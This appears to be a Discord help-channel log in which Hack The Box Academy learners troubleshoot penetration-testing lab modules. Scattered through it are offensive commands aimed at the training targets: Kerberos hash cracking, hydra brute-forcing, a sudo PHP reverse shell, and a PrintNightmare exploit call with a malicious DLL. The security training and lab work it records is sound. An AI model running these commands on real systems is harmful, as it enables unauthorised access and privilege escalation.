are you up for a DM on the Easy lab for the same module? I just got the flag one way and I'm curious what I'm missing for the other way

You have the sudo -l telling you what you can run with sudo

Nah it wasnt that

Just the right find command

Cause who would have that that you should not serch for flag rather "*flag.txt"

Where the f is that file now...

or anyone for that matter - if you've completed the Easy lab of Attacking Common Services, I would appreciate a nudge about the alternative way of getting the same flag

Hi guys

Im currntly going throuh this module https://academy.hackthebox.com/module/176/section/1778
I'm suposed to use this command hashcat -m 13100 -a 0 spn.txt passwords.txt --outfile="cracked.txt"
Where do I get the **password.txt **file from ?

hi guys, i have a target and task

 After performing a zone transfer for the domain inlanefreight.htb on the target system, how many DNS records are retrieved from the target system's name server? Provide your answer as an integer, e.g, 123.

but when i try to findout it via nslookup or dig, i just dont get answer
f.e.

dig axfr 10.129.7.13

; <<>> DiG 9.18.28-0ubuntu0.22.04.1-Ubuntu <<>> axfr 10.129.7.13
;; global options: +cmd
; Transfer failed.

Since you're working with DNS, you want to provide what domain/subdomain you're digging

So try dig axfr domain @ip

You don't need to know everything, but it's good to have some knowledge before you start.. But there are modules that cover some basic language in windows and linux, but you still need to be able to navigate and be familiar with some basic syntax there as well .. But sign up at the academy and just get started 🙂

it was mentioned in one of the sections

but whats ip? 1.1.1.1?

You want the IP of the name server you're digging into

.htb is not a global top level domain

You won't find it on 1.1.1.1

it is cloudflare dns

sure although I think the easy one there may just be one way

nah im struggling

1.1.1.1 is dns to cloudflare, like 1.0.0.1/ and 1.1.1.2/3

is there a resources folder attached to the module?

some modules have them some you have to find them in the machines themselves

No, I can't see any. But I just used one of the wordlist from /usr/share/wordlists

unfortunately I don't have that module on my pathway so I can't help

in the attacking common services rdp section and not getting any hits with user list and pass list included. anyone have any recommendations? do i need to mutate the pws.list or maybe rockyou.txt?

have you rdp'd with the creds they already give you?

inlanefreight.com add it to the /etc/hosts file

with the ip of the lab ofc

yes i have but was following down the examples so i learn the most that i can. it says to hydra or crowbar and they both come back with no results

I think they are just examples to show you how it would be in situations you don't have starting creds but have lists to work from you can try running hydra against word lists but you might be running down a rabbit hole

roger. just figured if they supplied a user.list and pass.list that maybe there was an easter egg or something if we went thru all of it

its the same for each sub module in the moidule so sometimes it is used sometimes it isn't... I could be wrong so might be worth a try but I didn't have to when I went through it earlier

ive been trying so dont waste your time as well lmao

no dramas mate

guys

is the point of nmap to analyze networks or attack them?

👍

Guys i have aquestion about the module "Getting started" in the section "Nibbles-Initial Foothold". I use Metasploit, im setting everything that is necessary and i get this message "this exlpoit may require manula cleanup of 'image.php' on the target". Does anyone know what's happening?

if you can run php as sudo, just make a reverse shell php script, set up a nc listener and run the php reverse shell as sudo

for example

sudo /usr/bin/php /tmp/reverse-shell.php

Its mainly to see what ports are open, and you can sometimes run some scripts using nmap buts that's just for more enumeration. so its basically for analyzing.

Need help on skills assesment of login brute forcing. I need to brute force the basic http-auth but the wordlists provided in the assesment when combined are takes 38 hours which is impractical. The problem I don't the username and in the section which teaches the basic auth brute force uses assumed username 'basic-auth-user' which doesn't seem to work here. Any ideas how to go forward? Also the default-credentials list doesn't work here from seclists , used 'ftp-betterpass.txt'

Its nothing super important, but in an actual penetration test or when attacking an active machine, you need to erase your tracks, and the image.php is what had the payload so you could get a reverse shell.

Just run the brute-forcing for 30 minutes, generally they don't make you run through the whole word-list, and the correct creds are not that far in, but I don't know the answer myself.

This has happed because they updated the module. My friend has done this through default credentials.

Before you try to bruteforce something make sure that you identify the service that you're trying to bruteforce and then go from there. The module mentions how to identify a service right?

service is basic-http-auth , when I paste IP in the browser it gives me the username-password dialog box

In the skill assessment they gave you two wordlists, have you used them?

Now agin.. Im at the beginning in the SQLi with slqmap and the first question is: What's the fastest SQLi type? i Type the answare and it says it is wrong, im sure im not wrong.. i tried to type it l||ike E-B and even E-b and e-b and it say it is wrong so i did try with e E B and E b / e b || some times i go crazy how sensitive it is for spelling and case sensitive.. Just saying... not asking for anny help

That is the problem when I use those wordlist , they will take approx 38 hrs to finish according the hydra status. So , i tried to bruteforce only password but I don't know the username , I tried some guesses 'basic-auth-user' which is used in the section of the module and other variations such as user, admin

Anyone here who solved the updated module.

thank you 3>

❤️

Anyway solved the problem.Tip: We have to use the wordlists given the section.

this just in: floor is made out of floor

i see

thanks bro

but how do i continue from there to create an attack?

and how do i make it so people wont be able to scan the ports on my networks

you'd have to set up firewall rules

how do i learn doing so?

but that's irrelevent to this channel

there isnt a module on htb for that?

read and follow #welcome and visit #homelab-sysadm

visit no access fr

first half of the statement you goofball

oh sorry 🥶

following #welcome instructions about linking your HTB account allows you to access the "no-access" channel

alr thanks

Hello, i am stuck in Introduction to Digital foransics in Memory Forensics
Examine the file "/home/htb-student/MemoryDumps/Win7-2515534d.vmem" with Volatility. Enter the Pid of the process that loaded zlib1.dll as your answer.

do i really need to pslist all PIDs and test them out one by one ? i tried to grep on the dll using dllists and other options but none of them returns a value that can be used to know the PID of the process that loaded the dll

Hey guys anyone can give hints aboout the enumeration of the mssql, exchange and sccm attacks module? I can't figure out what password is the one you're supposed to find, I tried every possible combination with what they tell us in the enumeration but nothing stands out

You're better off just doing a bash or powershell ping sweep directly from the pivot host, than trying to use proxychains + nmap to scan the internal network

Hey, looking for help - Module: Linux Privilege Escalation - Environment Enumeration. The flag submitted appears to be wrong but it is the only flag found on the system "HTB{S....d}" to show that I have the start and end of the flag. Any assistance?

there's a handful of different flags on the targets

some of the boxes are reused in that module

Okay, thanks....so keep looking 🙂

the methods in the section should lead you to the answer

Tried it but for some strange reason it didnt work, nvm there was no need for priv esc thanks tho for replying

Your first approach|| using dlllist is correct. Just be sure when you grep for zlib1.dll , you have it include enough lines before and after (so you can see which process actually loaded it)||

Good evening guys, how are you? Could someone help me with a question about xss filter bypasses, ADVANCED XSS AND CSRF EXPLORATION?

good evening, can you ask your question?

It would only be in the exfiltration part, I already found the payload that bypasses the filter

awesome!

Can i dm u?

no

because i havent done that module

Ah, okay

bro is no help 🤣

🥲

Can someone?

Bro is just curious 😆

If someone can give at least a tip on how to exfiltrate the data, it helps a lot 😊

feel free to DM

I seem to be having an issue with the Attack Enterprise Networks spawn/target - DMZ01 comes up for about 1 minute then becomes unresponsive, is anyone else having an issue?

i didn't have issues when i ran through it; reach out to support if changing vpn regions and respawning doesn't work

(green bubble on the website)

Cheers, I did yesterday but then it seemed to come right, will reach out again

How did you guys like the "Windows Privilege Escalation " module?

have you checked to confirm that your user was actually added to the domain admins group?

Yes I did. I actually found out my issue was that I needed to logoff and restart my computer. My issue was then fixed

Thank for the reply, in the end I did that indeed. I was just curious to understand why I got such results. Could not figure it out sadly.

the pivot host would need to have net.ipv4.ip_forward enabled i believe

which is why even if we just try to do proxychains ping , we never get any ping response back

if we try and ping a host on the internal LAN

I did not check it, but I am confused. I added verbose and packet trace to the request to see what is going on. When scanning one boxe at the time they respond, but if i scan a range then none of them do.

well also, when use proxychains nmap, we typically have to use -sT for a full connect

Oh I see, i should look for it next time. In this case i was going through a vpn so I could get pings back to be fair

so if I had to use proxychains nmap to enumerate an internal lan, i would probably just to something like proxychains nmap -Pn -sT --top-ports 20 172.16.8.0/24 -v

that way we are actually scanning individual ports

but it will do it for every host in the subnet

Also on Pwnbox, I have noticed we have to use sudo when using proxychains nmap

I am using Ligolo, but I will give it a try tomorrow for sure. Thank you for the suggestion

Hello Guys, I started CPTS course 2 months ago, I'm now at Attacking Common Services , DNS part and I'm truly stuck for 5 days. I read the forum but what seems to work with others didn't work with me, so i kindly request the help of someone who passed this .
Thanks in Advance

What exactly is not working?

who pinged

idk

i accidentally got it into my head ages ago that meterpreter is pronounced /'mitərˌpritər/ and now i can't read it any other way

its pronounced meterpreter

i agree

Guys I'm in ad module - llmnr/nbt-ns poisoning from Linux.

How long is responder supposed to take?

It's been running for abt an hour

are you running it from the ssh machine?

Yes

probably selected the wrong interface

Mmmmmm

How do I know which to select

use "ip a" and select the one that has 172.x.x.x

Why not the one with 10.x.x.x?

the AD network is on 172

Are all ad networks on 172?

Like is there a way I should have known to use 172?

No, but in the path they usually have AD on a separate network

Yea I got all the hashes

Thank you

So which one of the 90 trillion hashes do I crack

the ones they ask for

They are asking for the use that starts with letter b but I'm literally getting hundreds of hashes from all users

Like they always change and the terminal keeps getting spammed with hashes , I tried cracking a few with hashcat and john but it says no hashes loaded for all of them

hi

does this server teach how to hack

And also it says fingerprint failed academy-ea-web0.local

Over and over again

the section shows you where the responder logs are saved

can i hack on a phone

#rules and #welcome

thanks

so i can hack on a phone

can i hack to unban my account?

on playstation

no

1. That's illegal
2. That's illegal
3. ||that's illegal||

So it creates files even if it didn't finish running? I didn't touch it since you told me to change network

And also I'm not finding any in the directories from the module

yes

Password attack lab easy

i found them

Pwnbox?

And is responder still running?

responder never finishes

Oh

yes on the ssh machine

I literally can't count the number of all different hashes

Like 3/4 users are all in 2 files and they are all thrown together, fr there are hunders of them and are all different

use grep

Yes but the problem is not finding one hash it's that idk which one I should crack

its gonna look different every time

Bc I tried with a few before shutting responder down and it says the hash isnt recognized

Oh okay lemme try again

did you copy the whole thing?

First I copied the whole thing and tried with hashcat and john then I copied and pasted the commands and showed it to chatgpt and he made the hashes shorter but same thing

did you start from the username all the way to the very end with zeros

Ye

dm me the hash

Wait I'm on mobile

Lemme try again

Oh maybe it's working

@safe star Thank you module finished💪

Hello guys

Is it allowed to talk about exam cheating here ?

What?

This is a hacking group isn’t it, i need help with something related to lockdown browser but first I don’t wanna breach any rules so is it okey to talk about?

You want to cheat on an exam?

Yea

Bruh

What kind of dumb fucking question is this

😂

Go study

^

You guys must fun at parties lads

😭

Yes

So u dont understand sarcasm also?

W honesty

W me?

Thanks🥹

On the Active Directory Enumeration & Attacks exercise/labs, it says to SSH into the target, which I have done. When we run the commands, are we supposed to use the target (the machine I'm logged into) as the domain controller, or am I missing something obvious?

AD_ENUM Academy module is broken?

^C┌─[htb-student@ea-attack01]─[~/Downloads]
└──╼ $python3 /opt/PKINITtools/gettgtpkinit.py -pfx-base64 $(cat DC01_Cert) -dc-ip 172.16.5.5 inlanefreight.local/ACADEMY-EA-DC01$ dc01.ccache
2024-11-19 20:23:17,378 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2024-11-19 20:23:17,480 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
Traceback (most recent call last):
File "/opt/PKINITtools/gettgtpkinit.py", line 349, in <module>
main()
File "/opt/PKINITtools/gettgtpkinit.py", line 345, in main
amain(args)
File "/opt/PKINITtools/gettgtpkinit.py", line 315, in amain
res = sock.sendrecv(req)
File "/usr/local/lib/python3.9/dist-packages/minikerberos-0.2.20-py3.9.egg/minikerberos/network/clientsocket.py", line 87, in sendrecv
minikerberos.protocol.errors.KerberosError: Error Name: KDC_ERR_PADATA_TYPE_NOSUPP Detail: "KDC has no support for PADATA type (pre-authentication data)"

It looks like KDC does not supprot to authenticate with certificate.

wym? the ssh target has another network interface to attack the AD domain

That's good to know, but I still don't know what the DC is for INLANEFREIGHT.LOCAL. Is it static throughout the exercises? Are we already supposed to have this information documented somewhere?

yeah its static, you can check the /etc/hosts file

better to say what module/section and question you're on. you just posted some random error with PKINIT which i don't see when searching the ad enum and attack module.

Nothing in there that looks like a DC:
$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 debian12-parrot

::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
127.0.0.1 localhost
127.0.1.1 htb-2x1ratdvaf htb-2x1ratdvaf.htb-cloud.com

is that the ssh machine?

Not possible to tell if you don't include the section. There are multiple different environments in that module. Generally you can easily guess the dc by just pinging dc01, dc02, dc03, etc

Dang, you're right. That wasn't the right machine. I went to eat dinner and got disconnected. I think the DC IP in the /etc/hosts file solves my issue.

Thank you for your help.

There is a section after Attacking FTP about latest vulnerabilities I believe. Give that a look.

Anyone willing to teach a newb. I want to start earning but I need some help with where to start

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Hi, if anyone can help witht the debugging section of the malware anaylsis part. Inetsim is working, i have made all the changes yet i still get the sandbox message, even after being patched into a new exe.

would appricate any guidence

have looked at the forums but there isnt much help there....

extremely confused as to what to do atp, tried a lot of fixes but none of them seem to work? Just wondering if its the module atp as a lot of people have had a similar problem but no one outlines a fix.

I have searched and even wrote a python script to search all txt files for the possibly other flags and found nothing. I did so as root. Still nothing more than one flag under the root folder which is not the correct answer. Any other hints?

How did you end up as root?

use a find command and look for HTB

Hello guys. I"m currently working on the subverting query logic section of the SQL injection module on the CPTS path. I'm getting successful logins under the username "admin", but am having trouble getting one under "tom" (for the question). Even when using tom as the username and using "hat' OR '1'='1"

As the password without the quotes, it keeps saying I have a successful login under the "admin" username. Any tips for me?

So I jumped forward to the next section, and was able to use a comment injection to get it... However the previous section didn't cover comment injections, so I'm still curious how this section was intending for me to use a SQL injection.

It is Bleeding Edge Vulnerabilities and PetiPotam section.

I searched this kind of errors in this forum. Many people have been faced with this error. It might look like Cert error or AD setting error.

I would recommend sticking to the commands provided in the section instead of going crazy with a python script etc. Find a way to escalate your privs then search and investigate hidden files with your elevated privs. You can do this all without root.

Okay, I got root, but I will review the list of commands provided in the section again.

are you sure you're connected to the right box? i don't think root is the intended path, although you should be able to get the flag if you have root as well.

100%, I have used use the click copy for the IP address, and ssh'd into the box as htb-student

Hello everyone I was trying to make payment for CPTS exam but payment keeps being rejected and the support I’m getting is not so good. HTB accepts only credit card payment ? No PayPal or debt card choice?

hi guys. just a quick query. what im looking at in the module and what im looking at in the vm are showing two different things?

why is this when i have replicated the steps the same

depends on the module, but not all of them are simply copy/paste follow along. it teaches you the concepts, then you must apply the concepts in a challenge to find the flag.

i understand that, the module asks us to simply recreate the steps and yet it doesnt work?

this is for the debugging section in intro to malware anaylsis btw

"Reproduce all the debugging procedures mentioned in this section and provide the hidden shellcode-related hex values from the final screenshot as your answer. Remove all spaces."

well i haven't done that module so i can't help much

reach out to support on the website, no one here can help with that

i didn't get that error when i did it, but it's been a while something could have broke. are you sure you got the right data for the cert?

Thanks you SuperNuts, your response to simply go back use the commands in the section worked, I got the flag.

i cannot pronounce it properly in my head

has anyone here actually done the malware anyalsis module...

just interpreter but meterpreter

yes for sure. because I got this base64 encoded cert from relay. and error message is AD does not support smart card logon.
It is not the cert problem. I think this machine is broken now.

and I am for sure. windows macine also does not work with rubeus as well.

I just tried the module and got the same error you got

i don't see anything in my notes about this, could be the box is broken right now or i'm just forgetting something

you may want to post in #1234357888114364508

got it. thanks

i know that's how it's pronounced

that's why i said "i accidentally got it into my head ages ago that meterpreter is pronounced /'mitərˌpritər/ and now i can't read it any other way"

but interpreter

but meter preter

https://academy.hackthebox.com/module/103/section/973

XSS module, reflectes XSS section. They mention that in order to weaponize reflected XSS, if the vulnerable parameter is part of a get request you can simply make the request then copy it from firefox network tab. But they do not show you how to weaponize it when the paramterer vulnerable to XSS is not part of a GET request. In this case copying the link does not help, as the request is part of the body. Anyone knows how to weaponize it in this case ? Or is this something they cover in the advanced XSS modue ?

You can use other verbs with things like curl or web proxy

yeah, but in that case what you copy as curl and coerce the user into running the curl command ?

the link you want to use..

but the parameter is not part of the link when it's a post request....

the browser sends the verb with the link

why would their browser post or something though

usually browsers do get requests, there are others that get the page too

but its not going to send a post request without it uploading or something

I am not sure I follow you here, for me when the request is post, the browser does not include the parameter

maybe i'm not understanding if you're asking how to weaponize it or send the payload to the victim, but i thought you asked how to weaponize it. it's the same as the get request

how is it the same as the get request as parameter is no longer part of the URL ?

i don't know what you're asking. for this section specifically, you can see they're having you paste the link into your browser and visit it

so you can make the same request, aka weaponize it, using different verbs other than "get" with curl or something like burpsuite/zap

That;s the entire point they only ever show you how to weaponize vulnerable GET parameters

if you're just visiting the page in firefox it's not going to perform a HEAD verb or something automatically

the weaponization of the exploit happens from you not the target browser, the browser is just the vehicle for you to send the target to your payload

if it's a POST request it's not gonna be in the URL so not much you can do there

you could do CSRF but that's not XSS

Much appreciated, thanks for the info 🙂

hey guys, having trouble with this question ,* Find the user for the RDP service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.* in the Network Services section in the Password attacks module, I used hydra -L username.list -P password.list rdp://10.129.56.244 , however unlike the other techniques taught I get no prompt as to which password works, has anyone else had this issue

I didn't have that issue

did you use any extra filters or anything? I've reset the box twice but [3389][rdp] account on 10.129.227.69 might be valid but account not active for remote desktop: login: john password: miguel, continuing attacking the account. is all I get for the whole wordlist

no exact same as you

is the target still up? maybe reboot the vm or something or try pwnbox

I've tried pwnbox and rebooted the target like 4 times

Whitebox attacks - advanced exploitation
Can anybody tell me where the flag is? Literally cant find it lol, checked databases etc

hi

Ask your question and don't ask to ask 🙂

I tried everything but it didn't work
I got answers 26, 87 but they are wrong answer

@storm elk

Please, when asking a question, don't forget to mention the module and section you're stuck in (the names, not a link or just writing the numbers)

@storm elk

i found

thanks for help

everyone can help me this module for wsus,why I follow the guid to do also is error:https://academy.hackthebox.com/module/263/section/3095

Hello my name is Fred. I am new to the world of hacking. I need someone to hold my hands and help me since i am self learning. I am in Kenya Africa where resources are hard to acquire but i have been putting in the work and my efforts has led me here . Help me

I am sure that I have done everything correctly, whether I am doing it myself or following the instructions in the chapter, but it always prompts "Access deny" at the last step

Hello Fred. Welcome. I'd follow the getting started if I were you (link below) but nobody is going to hold your hand unfortunately.

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Also - I recommend you to read the #rules and #welcome first

@idle summit - please - do not send dm's without permission. (see #rules )

@storm elk sorry

If you want to learn more - follow the fundamentals modules on Academy and see what you like. Follow a path

anyone else do password attacks and attacking common services at the same time just because password cracking takes so long?

Has anyone given the eJPTv2 exam

Module: Shells & Payloads , Section: PHP Web Shells
Use what you learned from the module to gain a web shell. What is the file name of the gif in the /images/vendor directory on the target? (Format: xxxx.gif)
I followed the exact steps as mentioned in module , also tried with bulit in browser in burp , but when i try accessing the /images/vendor/test.php it gives a 404 error
What can i do?

I used the wwwolf php web shell as per the module

I used metasploit with linux/http/rconfig_vendors_auth_file_upload_rce module which was discussed before in the same module, that worked. But why is the intended method not working??

someone who has Sightless root flag?

#boxes

IF you don't have access, please, follow instructions in #welcome

Can you access the modules that you've finished after your subscription has expired ?

yes

cube icon not showing?

anywhere on the site

Hey guys ^^ i need help / someone to confirm something for me (Sorry for the huge textblob)

In the AEN Module at the Information Gathering stage after setting up Dynamic Port forwarding the module recommends to check the port forwarding with proxychains + nmap (it should return open ports, but it only returns filtered Ports)

I also tryd to the meterpreter Section of the Tunneling and Port forwarding module which also only returned filtered Ports.

So my Question is now: Is the proxychains package broken? or is it just normal to return only filtered ports due to some update. (it worked around 6 month prior to today)

Can someone try to check if it works for them.

What i already tried.

Resterting the Target
Reseting the Target
Restarting the VPN
Switchng the VPN
Switching to pwnbox
Switching pwnbox and vpn to multiple different Locations / Servers
1 for 1 copy the Provided answers from the HackTheBox team which comes with my subscrition.

netstat confirms that the port is forwardet correctly.
using proxychains to copy a file via SSH worked.

Yes it was a -sT nmap scan

@feral charm

has there been any word on upcoming content on ICS / OT ? The Alchemy pro lab makes me hopeful

The Practice Lab on the Documentation & Reporting module is a lot of work

Anyone know how to resolve this

Ah I see your problem

You’re trying to list the shares right?

Yes

What’s the domain you were given?

smbclient -N -L \\10.129.99.41\ you’re gonna wanna do this command

Or to specify a user

Use -U

Don’t forget the slashes otherwise smbclient won’t know what you’re talking about

do_connect: Connection to 10.129.99.41htb-student failed (Error NT_STATUS_UNSUCCESSFUL)

I meant -U

Can you copy paste the exact command i can't get it right 😆

So the command should look like

smbclient -L //10.129.99.41 -U htb-student

do_connect: Connection to 10.129.99.41 failed (Error NT_STATUS_IO_TIMEOUT)

Dont think it likes me

@modest basalt please don't just post random CTF in channels.

sorry

Hi guys

on the web requests module, for the last question on the crud api's I accidentally deleted the flag from the server/api

https://forum.hackthebox.com/t/htb-academy-windows-fundamentals-module-nt-status-io-timeout-when-using-smbclient/243526/8

First, try to update any city's name to be 'flag'. Then, delete any city. Once done, search for a city named 'flag' to get the flag.

I accidentally deleted the flag and now it doesn't give me the flag, what should I do? I can't reset the IP as well

the command I ran

ok nvm I was able to reset it ( for some reason the reset button is there but hidden)

Bumping this issue.

Hmm, I haven't done both of them, pretty sure from what I have seen Password Attacks does take much longer time.

What's the error you getting?

I can just see smbmap detecting host.

yeah i started doing cbbh as well as password attacks, Im hoping the rest of the modules in cpts arent as long as password attacks

AD Enum & Attacks is.

It just connects and then disconnects.

looks like its checking for open ports

I'll fire up a target host and grab a screenshot, brb.

awesome

@naive sage @lusty thicket Nvm, it's working. It's just that it didn't permit NULL sessions and I wasn't authenticating. I thought something was wrong since I don't recall the tool being that verbose

awesome stuff man!

ahh ok

Hi everyone sorry for bothering in this channel, im doing the certified box and i need some hints, anyone had done the box that can help?

Hello guys, Im stuck in the public exploits module, someone that did it can help me?

#boxes if you can’t access, read #welcome

you beat me to that one.

State the section and your question and people might answer.

thanks ill check it out

it's the "Getting Started" module

And section? Or is the section public exploits?

maybe you didnt get it well 😄 You need to for example RENAME city1 to "flag". Then try to delete ANY CITY EXCEPT FLAG ! 😄 (for example delete city2) and then search for "flag" city 😄 Because what you did is, that you deleted flag 😄

"Public Exploits"

Okay 🙂

a rat and his friends crawling around your phone? is this real?

we cant help you buddy

Unfortunately, it's true, but these are virtual rats who constantly control my phone, wifi, mobile internet, apps, VPN and basically everything. I thought you guys were smart, I wasn't, so with your help and continuous data input, we could play a live catch and reveal his real identity.

we can't help you

if you have malware on your phone, reinstall it or clean it up with virus scanners

Unfortunately, it's been shot out of it, there's a lot I can do to restore it.

sudo python3 CVE-2021-1675.py inlanefreight.local/forend:Klmcargo2@172.16.5.5 '\172.16.5.225\CompData\backupscript.dll'
sudo smbserver.py -smb2support CompData /backupscript.dll -->Module Active Directory Enumeration & Attacks

it authenitcates succesfully but does not send the stage in msf console

Anyone mind helping with an explanation that is unclear for:
https://academy.hackthebox.com/module/237/section/2612

Rapid Triage Analysis...

the first demo is a time stomp identification but it doesnt clearly outline how to determine exactly how you identify which entry was changed

chat gpt gives both an answer and the opposing answer as... answers